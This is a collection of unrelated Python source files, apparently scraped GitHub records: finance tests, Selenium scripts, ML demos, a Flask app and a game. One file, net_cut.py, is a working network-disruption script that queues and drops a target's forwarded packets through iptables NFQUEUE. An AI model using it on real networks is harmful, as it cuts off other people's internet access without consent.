through the swap maturities loops through 5bp below the\nswap rate to 5bp above the swap rate and prints out the PVs. The PVs\nshould be 0 for the swap rate, they are close but I am not in a position to say\nif they are close enough\n\"\"\"\n\n# The Python module that wraps the dll\nimport phin\n# Load the module with the data in it\nimport data\n# Load the module with GBP swaps\nimport GBPInstrument\n\n# Get the data\nlibors = data.libors\nswaps = data.swaps\nfixedRate = data.fixedRate\nvalueDate = data.valueDate\nmaturityDate = data.maturityDate\nsettlementDate = data.settlementDate\ncurrentRate = data.currentRate\n\nmaturityYears = 5\n\n# Build the curve\nc = phin.curve(valueDate,libors,swaps);\nres = c.Build()\n\n\ndef BasicTest():\n # Build a new pay swap\n newSwap = GBPInstrument.GBPSwap(valueDate,maturityYears,fixedRate,True,c)\n print('Receiver Receive PV:', newSwap.pay_side_pv())\n print('Receiver Pay PV:', newSwap.receive_side_pv())\n print('Receiver PV:',newSwap.pv())\n\n # Build a new receive swap\n newSwap = GBPInstrument.GBPSwap(valueDate,maturityYears,fixedRate,False,c)\n print('Payer Receive PV:', newSwap.receive_side_pv())\n print('Payer Pay PV:', newSwap.pay_side_pv())\n print('Payer PV:',newSwap.pv())\n\n\n\ndef SanityCheck():\n \"\"\"\n Checks swap PVs by looping through the maturities then looping through 5bp\n below the swap rate to 5bp above and printing out the PVs\n \"\"\"\n bp = 0.0001\n\n # Iterate through the swaps\n for i,j in enumerate(swaps):\n for b in range(-10,11):\n s = GBPInstrument.GBPSwap(valueDate,i+1,j+b*bp,True,c)\n print(i+1,b,j+b*bp, s.pv())\n\n\ndef TestNewSwap():\n \"\"\"\n Create a new swap and an existing swap with extaly the same inputs and\n calculate the pv. The difference in the pv's should be 0\n \"\"\"\n\n # Create and existing swap\n es = GBPInstrument.GBPExistingSwap(valueDate,maturityDate,fixedRate,currentRate,True,c)\n\n # Create a new swap\n ns = GBPInstrument.GBPSwap(valueDate,maturityYears,fixedRate,True,c)\n\n diffPV = ns.pv() - es.pv()\n\n print('This should be 0', diffPV)\n\n \n\n","repo_name":"PhineasCampbell/phin_linux","sub_path":"SwapTest.py","file_name":"SwapTest.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30541014800","text":"from selenium import webdriver\nimport webbrowser, requests, bs4\nimport time\nimport datetime\nimport os\n\nlink = raw_input(\"Enter link of page want to download: \")\t\t#link of page to download\n\nfor i in xrange(0,365):\t\t\t\t\t\t\t\t\t\t\t#dsleep till 2am \n # sleep until 2AM\n t = datetime.datetime.today()\n future = datetime.datetime(t.year,t.month,t.day,2,0)\n if t.hour >= 2:\n future += datetime.timedelta(days=1)\n time.sleep((future-t).seconds)\n\nbrowser = webdriver.Chrome()\n\nbrowser.get(link)\t\t\t\t\t\t\t\t\t\t\t\t\t#open download page\n\t\nelems = browser.find_elements_by_xpath(\"//a[@href]\")\t\t\t\t#find links\nfor elem in elems:\n\ttry:\n\t\twebbrowser.open(elem.get_attribute(\"href\"))\t\t\t\t\t#open each links\n\texcept TypeError:\n\t\tcontinue\n #print elem.get_attribute(\"href\")\n\n\nfor i in xrange(0,365): #dsleep till 2am \n # sleep until 2AM\n t = datetime.datetime.today()\n future = datetime.datetime(t.year,t.month,t.day,5,0)\n if t.hour >= 5:\n future += datetime.timedelta(days=1)\n os.system(\"shutdown -h now\")\n","repo_name":"thobhanifreddy/download_index_of","sub_path":"download1.py","file_name":"download1.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25522152679","text":"def countNum(card_list):\n cnt_list = [0 for i in range(0, 10)]\n for card in card_list:\n cnt_list[card] += 1\n return cnt_list\n\n\ndef isRun(card_list):\n cnt_list = countNum(card_list)\n for i in range(0,8):\n if cnt_list[i] > 0 and cnt_list[i+1] > 0 and cnt_list[i+2] > 0:\n return True\n return False\n\n\ndef isTriplet(card_list):\n cnt_list = countNum(card_list)\n for cnt in cnt_list:\n if cnt >= 3:\n return True\n return False\n\n\ndef canWin(card_list):\n return isRun(card_list) or isTriplet(card_list)\n\n\ndef whoIsWinner(player1, player2):\n for turn in range(3, 7):\n list1 = player1[:turn]\n list2 = player2[:turn]\n if canWin(list1):\n return 1\n if canWin(list2):\n return 2\n\n return 0\n\n\nif __name__ == '__main__':\n TC = int(input())\n for T in range(1, TC + 1):\n tmp = input().split(' ')\n player1 = [int(tmp[2*i]) for i in range(0,6)]\n player2 = [int(tmp[2*i+1]) for i in range(0,6)]\n\n res = whoIsWinner(player1, player2)\n print(\"#%d %d\" % (T, res))","repo_name":"jjungyeun/AlgorithmStudy2021","sub_path":"SA/2104/5203.py","file_name":"5203.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42289423099","text":"from selenium import webdriver\nimport pytest\n\nlink = \"http://selenium1py.pythonanywhere.com/\"\n\n\n@pytest.fixture\ndef browser():\n print(\"\\nstart browser for test..\")\n browser = webdriver.Chrome()\n return browser\n\n\nclass TestMainPage1:\n # Call the fixture in the test by passing it as parameter\n def test_guest_should_see_login_link(self, browser):\n browser.get(link)\n browser.find_element_by_css_selector(\"#login_link\")\n # print(\"===Found login_link(TS)===\")\n\n def test_guest_should_see_basket_link_on_the_main_page(self, browser):\n browser.get(link)\n browser.find_element_by_css_selector(\".basket-mini .btn-group > a\")\n # print(\"===Found Button(TS)===\")\n","repo_name":"srgkun/stepik_autotests_course","sub_path":"test_fixture2.py","file_name":"test_fixture2.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13580693920","text":"from sklearn.feature_extraction.text import CountVectorizer\nfrom normalizer import normalize_list_of_strings\n\n#corpus will be a list of strings.\ndef bow_extractor(corpus, ngram_range=(1,1)):\n\tvectorizer = CountVectorizer(min_df=1,ngram_range=ngram_range)#Accept terms with a minimum frequency of 1.\n\tfeatures = vectorizer.fit_transform(corpus)\n\n\treturn vectorizer, features\n\n\n\n#The following is for testing purposes only.\n\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn.cross_validation import train_test_split\n\ndef get_data():\n\tdata = fetch_20newsgroups(subset='all', shuffle=True, remove=('headers','footers','quotes'))\n\treturn data\n\ndef prepare_datasets(corpus,labels,test_data_proportion=0.3):\n\ttrain_x, test_x, train_y, test_y = train_test_split(corpus,labels,test_size=0.33,random_state=42)\n\treturn train_x, test_x, train_y, test_y\n\ndef remove_empty_docs(corpus, labels):\n\tfiltered_corpus = []\n\tfiltered_labels = []\n\tfor doc, label in zip(corpus, labels):\n\t\tif (doc.strip()):\n\t\t\tfiltered_corpus.append(doc)\n\t\t\tfiltered_labels.append(label)\n\treturn filtered_corpus, filtered_labels\n\ndataset = get_data()\ncorpus, labels = dataset.data, dataset.target\n\ntrain_corpus, test_corpus, train_labels, test_labels = prepare_datasets(corpus, labels, test_data_proportion=0.3)\n\nnorm_train_corpus = normalize_list_of_strings(train_corpus)\nnorm_test_corpus = normalize_list_of_strings(test_corpus)\n\nbow_vectorizer, bow_train_features = bow_extractor(norm_train_corpus)\nbow_test_features = bow_vectorizer.transform(norm_test_corpus)\n\n\nfrom sklearn.naive_bayes import MultinomialNB\n\nmnb = MultinomialNB()\n\nmnb.fit(bow_train_features,train_labels)\npredictions = mnb.predict(bow_test_features)\n\n\n\n\n\n'''\n\n\nCORPUS = [\n\"good day sir how are you today\", \n\"today is a lovely day for training\",\n\"today the sun is lovely what a day for track n field training\"\n]\nbow_vectorizer, bow_features = bow_extractor(CORPUS)\n\nfeatures = bow_features.todense()\nprint(features)\n\n#Accepts a list of strings.\nnew_features = bow_vectorizer.transform([\"Hello sir how are you what a day for training\"])\nnew_features = new_features.todense()\nprint(new_features)\n\n'''\n\n\n","repo_name":"slimgol/searchEngine","sub_path":"featureExtraction.py","file_name":"featureExtraction.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42595884134","text":"import random\nfrom turtle import Turtle, Screen\n\n\ndef random_move(t):\n \"\"\"random move by a turtle object\"\"\"\n dis = random.randint(1, 10)\n t.forward(dis)\n\n\ndef check_user_guess(guess, win_turtle):\n \"\"\"check if user guess is right or wrong \"\"\"\n if guess == win_turtle:\n print(f\"Congratulation! Your Guessed turtle color {guess} is right\")\n else:\n print(f\"Oh no! Your guessed turtle color {guess} is wrong\")\n\n\nscreen = Screen()\nscreen.setup(width=1000, height=600)\ncolors = ['red', 'blue', 'green', 'yellow', 'magenta']\n\nuser_guess = screen.textinput(title='Bets for turtles', prompt='guess which turtle is going to win?')\n\n# Create 5 turtle object and place them at the begging of the line and,\n# then append them in a list called 'turtles_list':\nsep = 0\nturtles_list = []\nfor index in range(5):\n tur = Turtle(shape='turtle')\n tur.penup()\n turtles_list.append(tur)\n # print(tur)\n tur.goto(x=-490, y=-150 + sep)\n tur.color(colors[index])\n sep += 75\n\n# print(turtles_list)\n# Move each turtle to a random distance forward until either one of them is reach the finish line:\nnot_finish = True\nwinner = ''\nwhile not_finish:\n for i in range(len(turtles_list)):\n tur = turtles_list[i]\n random_move(tur)\n x_coordinate = tur.xcor()\n if x_coordinate > 480:\n winner = tur\n not_finish = False\n break\n # print(f'tur{i} {x_coordinate}')\n\npen_color, tur_color = winner.color() # getting winner turtle's color\n\n# Printing out the winner turtle color and check if my guess turtle color is wright or wrongL\nprint(f'winner is turtle of color {tur_color}')\ncheck_user_guess(guess=user_guess, win_turtle=tur_color)\n\nscreen.exitonclick()\n","repo_name":"akds-singh/PROJECT_from_pycharm","sub_path":"OOPs_1/turtles_race.py","file_name":"turtles_race.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41012114261","text":"import numpy as np\nfrom faker import Faker\nimport random\nfrom tqdm import tqdm\nfrom babel.dates import format_date\n\nfake = Faker()\nFaker.seed(12345)\nrandom.seed(12345)\n\nclass SpecialTokens:\n SOS_token = '>'\n EOS_token = '<'\n UNK_token = '?'\n PAD_token = ';'\n\n\n# Define format of the data we would like to generate\nFORMATS = ['short',\n 'medium',\n 'long',\n 'full',\n 'full',\n 'full',\n 'full',\n 'full',\n 'full',\n 'full',\n 'full',\n 'full',\n 'full',\n 'd MMM YYY', \n 'd MMMM YYY',\n 'dd MMM YYY',\n 'd MMM, YYY',\n 'd MMMM, YYY',\n 'dd, MMM YYY',\n 'd MM YY',\n 'd MMMM YYY',\n 'MMMM d YYY',\n 'MMMM d, YYY',\n 'dd.MM.YY']\n\n# change this if you want it to work with another language\nLOCALES = ['en_US']\n\ndef load_date():\n \"\"\"\n Loads some fake dates \n :returns: tuple containing human readable string, machine readable string, and date object\n \"\"\"\n dt = fake.date_object()\n\n try:\n human_readable = format_date(dt, format=random.choice(FORMATS), locale='en_US') # locale=random.choice(LOCALES))\n human_readable = human_readable.lower()\n human_readable = human_readable.replace(',','')\n machine_readable = dt.isoformat()\n \n except AttributeError as e:\n return None, None, None\n\n return human_readable, machine_readable, dt\n\ndef load_dataset(m):\n \"\"\"\n Loads a dataset with m examples and vocabularies\n :m: the number of examples to generate\n \"\"\"\n \n human_vocab = set()\n machine_vocab = set()\n dataset = []\n Tx = 30\n \n\n for i in tqdm(range(m)):\n h, m, _ = load_date()\n m = m\n sme = SpecialTokens.SOS_token + m + SpecialTokens.EOS_token\n if h is not None:\n dataset.append((h, sme))\n human_vocab.update(tuple(h))\n machine_vocab.update(tuple(m))\n\n dataset.sort(key= lambda x: len(x[0]))\n\n human_special_tokens = [SpecialTokens.PAD_token, SpecialTokens.UNK_token]\n machine_special_tokens = [SpecialTokens.PAD_token, SpecialTokens.SOS_token, SpecialTokens.EOS_token]\n \n human = dict(zip(human_special_tokens + sorted(human_vocab), \n list(range(len(human_vocab) + len(human_special_tokens)))))\n \n machine = dict(zip(machine_special_tokens + sorted(machine_vocab),\n list(range(len(machine_vocab) + len(machine_special_tokens)))))\n \n return dataset, human, machine\n\n\n","repo_name":"Kamil2601/machine-translation","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27613856407","text":"import os\nimport csv\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport argparse\n\nnp.set_printoptions(suppress=True)\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nnp.random.seed(0)\n\nEPOCHES = 10\nBATCH_SIZE = 16\nlearning_rate = 0.0002\n\nfile_x = '../dsets/ALL/mnist_test_x.csv'\nfile_y = '../dsets/ALL/mnist_test_y.csv'\nreal_X, real_Y = pd.read_csv(file_x, header=None).to_numpy(\n), pd.read_csv(file_y, header=None).to_numpy()\n\n\nnum_outputs = 10 \nnum_inputs = 784 \nw=[]\nb=[]\n\ndef mlp(x, num_inputs, num_outputs, num_layers, num_neurons):\n w = []\n b = []\n for i in range(num_layers):\n # weights\n w.append(tf.Variable(tf.random_normal(\n [num_inputs if i == 0 else num_neurons[i - 1],\n num_neurons[i]], dtype=tf.float64),\n name=\"w_{0:04d}\".format(i), dtype=tf.float64\n ))\n # biases\n b.append(tf.Variable(tf.random_normal(\n [num_neurons[i]], dtype=tf.float64),\n name=\"b_{0:04d}\".format(i), dtype=tf.float64\n ))\n w.append(tf.Variable(tf.random_normal(\n [num_neurons[num_layers - 1] if num_layers > 0 else num_inputs,\n num_outputs], dtype=tf.float64) , name=\"w_out\",dtype=tf.float64))\n b.append(tf.Variable(tf.random_normal([num_outputs], dtype=tf.float64) , name=\"b_out\", dtype=tf.float64))\n\n # x is input layer\n layer = x\n # add hidden layers\n for i in range(num_layers):\n layer = tf.nn.relu(tf.matmul(layer, w[i]) + b[i])\n # add output layer\n layer = tf.matmul(layer, w[num_layers]) + b[num_layers]\n\n return layer\n\n# input images\nx = tf.placeholder(dtype=tf.float64, name=\"x\", \n shape=[None, num_inputs]) \n# target output\ny = tf.placeholder(dtype=tf.float64, name=\"y\", \n shape=[None, num_outputs])\nnum_layers = 0\nnum_neurons = []\nlearning_rate = 0.01\nn_epochs = 30\nbatch_size = 100\nn_batches = int(len(real_X)/batch_size)\n\nmodel = mlp(x=x,\n num_inputs=num_inputs,\n num_outputs=num_outputs,\n num_layers=num_layers,\n num_neurons=num_neurons)\n\nloss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=model, labels=y))\noptimizer = tf.train.GradientDescentOptimizer(\n learning_rate=learning_rate).minimize(loss)\n\npredictions_check = tf.equal(tf.argmax(model, 1), tf.argmax(y, 1))\naccuracy_function = tf.reduce_mean(tf.cast(predictions_check, tf.float32))\n# save\nsaver = tf.train.Saver(var_list=None, max_to_keep=5, name='v2')\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init)\n if os.path.exists(\"./log/ckpt0/checkpoint\"):\n saver.restore(sess, './log/ckpt0/model')\n\n var_list = [v.name for v in tf.global_variables()]\n print(var_list)\n print(sess.run(var_list))\n feed_dict = {x: real_X, y: real_Y}\n accuracy_score = sess.run(accuracy_function, feed_dict=feed_dict)\n print(\"accuracy={0:.8f}\".format(accuracy_score))\n \n\n","repo_name":"LatticeX-Foundation/Rosetta","sub_path":"example/tutorials/code/tf-test_mlp_acc.py","file_name":"tf-test_mlp_acc.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":544,"dataset":"github-code","pt":"18"} +{"seq_id":"13056969832","text":"\n# #Step 3: Play Computer\n\n# year = int(input(\"What's your year of birth?\"))\n# if year > 1980 and year < 1994:\n# print(\"You are a millenial.\")\n# elif year > 1994:\n# print(\"You are a Gen Z.\")\n\n# 1.Input year by year eg.check for 1990\n# 2.Look at each line of code and see what it will evaluate\n# 3.Now check for 1994\n# 4.Error occurs when you type in 1994\n\n###<<>>###\n\n\n\nyear = int(input(\"What's your year of birth?\"))\nif year > 1980 and year < 1994: \n print(\"You are a millenial.\")\nelif year >=1994:\n print(\"You are a Gen Z.\")\n\n#1.Now we realize neither if nor else blocks catch 1994\n#2.you can write <=1994 in if block or >=1994 in else block\n","repo_name":"priyanka-111-droid/100daysofcode","sub_path":"Day013/13-3.py","file_name":"13-3.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"36921086858","text":"#!/usr/bin/env python\nimport netfilterqueue\nimport subprocess\nimport optparse\nimport os\n\n\ndef get_arguments():\n parser = optparse.OptionParser()\n parser.add_option(\"-c\", \"--chain\", dest=\"chain\", help=\"adding the chain , e.g FORWARD,INPUT,OUTPUT\")\n parser.add_option(\"-n\", \"--num\", dest=\"num\", help=\"queue num, e.g 0\")\n (options, arguments) = parser.parse_args()\n if not options.chain:\n parser.error(\"[-] Pls specify a chain, use --help for more help\")\n elif not options.num:\n parser.error(\"[-] Pls specify a queue num, use --help for more help\")\n return options\n\n\ndef starting_up(chain, num):\n print(\"[+] Default chain packets are send through another interface\")\n subprocess.call([\"iptables\", \"-I\", chain, \"-j\", \"NFQUEUE\", \"--queue-num\", num])\n # \"Enable ip forwarding as Kali might not be processing incoming and outgoing packet like a normal router do \"\n subprocess.call([\"echo\", \"1\", \"/proc/sys/net/ipv4/ip_forward\"], stdout=open(os.devnull, 'wb'))\n\n\ndef cutting_internet_connection_target(packet):\n print(packet)\n packet.drop()\n\n\ndef iptables_flush():\n print(\"[+] flushing iptables!!\")\n subprocess.call([\"iptables\", \"--flush\"])\n\n\noptions = get_arguments()\n\n\ntry:\n starting_up(options.chain, options.num)\n queue = netfilterqueue.NetfilterQueue()\n queue.bind(0, cutting_internet_connection_target)\n queue.run()\nexcept KeyboardInterrupt:\n iptables_flush()\n","repo_name":"BEARKUNN/KALI-LINUX-REPO-","sub_path":"net_cut.py","file_name":"net_cut.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38191232235","text":"# assalomu alaykum\n# bugungi dasr funksiyaga royhatlarni togri kochirish bilan tanishdik\n\n# baholar nomli funksiya yaratamiz qani kettik\n\ndef bohola(ismlar):\n boholar = {}\n for ism in ismlar:\n\n boho = input(f\"{ism.title()}ning bohosini kiriting: \")\n boholar[ism] = int(boho)\n return boholar\ntalabalar = ['anvar','shokir','nodir','jamshid']\nprint(bohola(talabalar))\nprint(talabalar)","repo_name":"Shoxruhk/python-sariq.dev-javoblar","sub_path":"dars21.py","file_name":"dars21.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70193760682","text":"import pandas as pd\r\nfrom urllib.request import urlopen\r\nfrom bs4 import BeautifulSoup\r\npage = urlopen('https://www.flipkart.com/mens-watches-store?otracker=nmenu_sub_Men_0_Watches')\r\nsoup = BeautifulSoup(page, 'lxml')\r\ndabba = soup.find_all('div', class_=\"_3liAhj _2Vsm67\")\r\nitems = []\r\nfor i in range(dabba.__len__()):\r\n each = list()\r\n each.append(dabba[i].find('a', class_=\"_2cLu-l\").text)\r\n each.append(dabba[i].find('div', class_=\"_1vC4OE\").text)\r\n if dabba[i].find('div', class_=\"VGWI6T\"):\r\n each.append(dabba[i].find('div', class_=\"VGWI6T\").text)\r\n else:\r\n each.append(\"NAN\")\r\n items.append(each)\r\ndf = pd.DataFrame(items, columns = [\"Name\", \"Price\", \"Discount\"])\r\ndf.to_csv('watches.csv')\r\nprint(df)","repo_name":"jatin-jeena/Web-Scraping","sub_path":"Flipcart-Watch Finder/Flipcart_watch_scrapping.py","file_name":"Flipcart_watch_scrapping.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"6317946858","text":"from zDB_Tutorial.Backend.app import APP_MAIN, APPLOGIN\nfrom flask import render_template, flash,redirect,url_for,abort\nfrom zDB_Tutorial.Backend.app.forms import LoginForm , RegistrationForm , EditProfileForm, TestAjex\nfrom flask_login import current_user, login_user, logout_user , login_required\nfrom zDB_Tutorial.Backend.app.model import User\nfrom flask import request\nfrom werkzeug.urls import url_parse\nfrom werkzeug.security import generate_password_hash\nfrom datetime import datetime\nimport json\n\n\n@APP_MAIN.route('/')\n@APP_MAIN.route('/index')\n@login_required\ndef index():\n user = {'username': 'Saad'}\n posts = [\n {\n 'author': {'username': 'John'},\n 'body': 'Beautiful day in Portland!'\n },\n {\n 'author': {'username': 'Susan'},\n 'body': 'The Avengers movie was so cool!'\n }\n ]\n return render_template('index.html', title='Home', posts=posts)\n\n\n\n@APP_MAIN.route('/login', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.objects(username=form.username.data)\n if(len(user)==0):\n flash('Invalid username or password')\n return redirect(url_for('login'))\n else:\n user = user[0]\n if user is None or not user.check_password(form.password.data):\n flash('Invalid username or password')\n return redirect(url_for('login'))\n login_user(user, remember=form.remember_me.data)\n next_page = request.args.get('next')\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('index')\n return redirect(next_page)\n return render_template('login.html', title='Sign In', form=form)\n\n\n@APP_MAIN.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n\n@APP_MAIN.route('/register', methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n form = RegistrationForm()\n if form.validate_on_submit():\n user = User(username=form.username.data,\n email=form.email.data,\n password_hash=generate_password_hash(form.password.data))\n user.save()\n flash('Congratulations, you are now a registered user!')\n return redirect(url_for('login'))\n return render_template('register.html', title='Register', form=form)\n\n@APP_MAIN.route('/user/')\n@login_required\ndef user(username):\n user = User.objects(username=username)\n if(len(user)==0):\n abort(404)\n else:\n user=user[0]\n posts = [\n {'author': user, 'body': 'Test post #1'},\n {'author': user, 'body': 'Test post #2'}\n ]\n return render_template('user.html', user=user, posts=posts)\n\n\n@APP_MAIN.before_request\ndef before_request():\n if current_user.is_authenticated:\n current_user.update(last_seen = datetime.utcnow())\n current_user.reload()\n\n\n@APP_MAIN.route('/edit_profile', methods=['GET', 'POST'])\n@login_required\ndef edit_profile():\n form = EditProfileForm()\n if form.validate_on_submit():\n current_user.update(about_me = form.about_me.data)\n current_user.reload()\n flash('Your changes have been saved.')\n return redirect(url_for('edit_profile'))\n elif request.method == 'GET':\n form.about_me.data = current_user.about_me\n return render_template('edit_profile.html', title='Edit Profile',\n form=form)\n\n\n@APP_MAIN.route('/testajax', methods=['GET', 'POST'])\n@login_required\ndef test_ajax():\n form = TestAjex()\n if form.validate_on_submit():\n print(form.about_me.data)\n print(form.about_me2.data)\n return render_template('ajaxtest.html', title='Test Ajax',\n form=form)\n\n\n@APP_MAIN.route('/here', methods=['POST'])\ndef kaka():\n s1= request.form['about_me']\n s2 = request.form['about_me2']\n print(\"s1: \"+s1+s2)\n return json.dumps({'status': s1+s2})","repo_name":"Koushik-Deb/VocLab-Latest","sub_path":"zDB_Tutorial/Backend/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34856624913","text":"# -*- coding: utf-8 -*-\nimport os\nimport time\nfrom utils import data_helpers\nimport numpy as np\nimport tensorflow as tf\nfrom rnn_model import PTBModel\nfrom utils.config import SmallConfig, MediumConfig, LargeConfig, FilePath, Config\n\n\ndef run_epoch(session, m, data, eval_op, verbose=False, vocabulary=None):\n \"\"\"\n :param session for computation\n :param m model object\n :param data input data\n :param eval_op\n :param verbose\n :param vocabulary\n Runs the model on the given data.\"\"\"\n print(data)\n size_limit = 30\n find_stop_word = False\n state = m.initial_state.eval()\n current_step = 0\n gen_words = []\n input_data = data\n while (current_step < size_limit) and (not find_stop_word):\n state, probs, logits, _ = session.run([m.final_state, m.probabilities, m.logits, eval_op],\n {m.input_data: input_data,\n m.initial_state: state})\n chosen_word = np.argmax(probs, 1)\n print(\"Probabilities shape: %s, Logits shape: %s\" %\n (probs.shape, logits.shape) )\n print(chosen_word)\n next_word = 'unk'\n next_word_id = 0\n if vocabulary is not None:\n next_word_id = chosen_word[-1]\n for word_, word_id_ in vocabulary.iteritems():\n if word_id_ == next_word_id:\n print(word_)\n next_word = word_\n # next_word_arr = next_word.split('')\n # if len(next_word_arr) > 1:\n # next_word = next_word_arr[0]\n # find_stop_word = True\n if next_word == '':\n find_stop_word = True\n gen_words.append(next_word)\n input_data = np.array(input_data)[:, 1:]\n input_data = np.concatenate((input_data, np.array([[next_word_id]])), axis=1)\n current_step += 1\n return gen_words\n\n\ndef get_config(model_option):\n if model_option == \"small\":\n return SmallConfig()\n elif model_option == \"medium\":\n return MediumConfig()\n elif model_option == \"large\":\n return LargeConfig()\n else:\n raise ValueError(\"Invalid model: %s\", model_option)\n\n\ndef main():\n # --data_path=/tmp/simple-examples/data/ --model small\n data_path = FilePath.data_path\n model_option = Config.model_option\n if not data_path:\n raise ValueError(\"Must set --data_path to PTB data directory\")\n\n out_dir = 'models'\n checkpoint_dir = os.path.join(out_dir, \"checkpoints\")\n\n raw_data = data_helpers.raw_data(data_path)\n train_data, valid_data, test_data, vocabulary = raw_data\n\n config = get_config(model_option)\n eval_config = get_config(model_option)\n eval_config.batch_size = 1\n # eval_config.num_steps = 1\n\n # sentence = 'Chảo Inox chống dính Withford-MỸ GPP03-FF28'\n # sentence = 'Chảo tráng men Natural'\n # sentence = 'Ốp lưng Spigen iPhone 6/ 6S Plus Case Neo Hybrid Gunmetal SGP11664'\n # sentence = 'Ốp lưng Spigen iPhone 6/ 6S Plus Case Neo Hybrid'\n # sentence = 'Ốp lưng Spigen iPhone 6/ 6S'\n # sentence = 'Ốp lưng Spigen Galaxy S6'\n # sentence = 'Saller: Chào em! Chị có thể giúp gì cho em? '\n # sentence = 'Mary: Chị ơi! Em có thể mặc thử được không ạ?Saller:'\n # sentence = 'Bạn khỏe không? '\n # sentence = 'Bạn khỏe'\n # sentence = 'Anh khỏe không? '\n # sentence = 'Chị khỏe không? '\n sentence = 'Chị ăn cơm chưa? '\n predict_data = data_helpers.predict_data(sentence, vocabulary, config.num_steps)\n eval_config.num_steps = len(predict_data[0])\n\n with tf.Graph().as_default(), tf.Session() as session:\n initializer = tf.random_uniform_initializer(-config.init_scale,\n config.init_scale)\n\n with tf.variable_scope(\"model\", reuse=None, initializer=initializer):\n m = PTBModel(is_training=True, config=config)\n with tf.variable_scope(\"model\", reuse=True, initializer=initializer):\n mvalid = PTBModel(is_training=False, config=config)\n mtest = PTBModel(is_training=False, config=eval_config)\n mpredict = PTBModel(is_training=False, config=eval_config)\n\n # tf.initialize_all_variables().run()\n saver = tf.train.Saver(tf.all_variables(), max_to_keep=1)\n ckpt = tf.train.get_checkpoint_state(checkpoint_dir)\n if ckpt and ckpt.model_checkpoint_path:\n model_checkpoint_path_arr = ckpt.model_checkpoint_path.split(\"/\")\n abs_model_checkpoint_path = checkpoint_dir + '/' + model_checkpoint_path_arr[-1]\n saver.restore(session, abs_model_checkpoint_path)\n\n # for i in range(config.max_max_epoch):\n # lr_decay = config.lr_decay ** max(i - config.max_epoch, 0.0)\n # m.assign_lr(session, config.learning_rate * lr_decay)\n #\n # print(\"Epoch: %d Learning rate: %.3f\" % (i + 1, session.run(m.lr)))\n # train_perplexity = run_epoch(session, m, train_data, m.train_op,\n # verbose=True, vocabulary=vocabulary)\n # print(\"Epoch: %d Train Perplexity: %.3f\" % (i + 1, train_perplexity))\n # valid_perplexity = run_epoch(session, mvalid, valid_data, tf.no_op(), vocabulary=vocabulary)\n # print(\"Epoch: %d Valid Perplexity: %.3f\" % (i + 1, valid_perplexity))\n #\n # path = saver.save(session, checkpoint_prefix, global_step=i)\n\n gen_words = run_epoch(session, mpredict, predict_data, tf.no_op(), vocabulary=vocabulary)\n print('=' * 50)\n print('=' * 50)\n print(sentence)\n print(' '.join(gen_words))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"paduvi/machinelearning","sub_path":"rnn_test/rnn_predict.py","file_name":"rnn_predict.py","file_ext":"py","file_size_in_byte":5786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28284371186","text":"# This file is part of gLund by S. Carrazza and F. A. Dreyer\n\nfrom __future__ import print_function\nimport sys\nfrom setuptools import setup, find_packages\n\nif sys.version_info < (3,6):\n print(\"cyclejet requires Python 3.6 or later\", file=sys.stderr)\n sys.exit(1)\n\nwith open('README.md') as f:\n long_desc = f.read()\n\nsetup(name= \"cyclejet\",\n version = '0.0.1',\n description = \"CycleGAN models for jet substructure \",\n author = \"F. Dreyer, S. Carrazza\",\n author_email = \"frederic.dreyer@cern.ch, stefano.carrazza@cern.ch\",\n url=\"https://gitlab.cern.ch/JetsGame/cyclegan\",\n long_description = long_desc,\n entry_points = {'console_scripts':\n ['cyclejet = cyclejet.scripts.run:main',]},\n package_dir = {'': 'src'},\n packages = find_packages('src'),\n zip_safe = False,\n classifiers=[\n 'Operating System :: Unix',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Scientific/Engineering :: Physics',\n ],\n 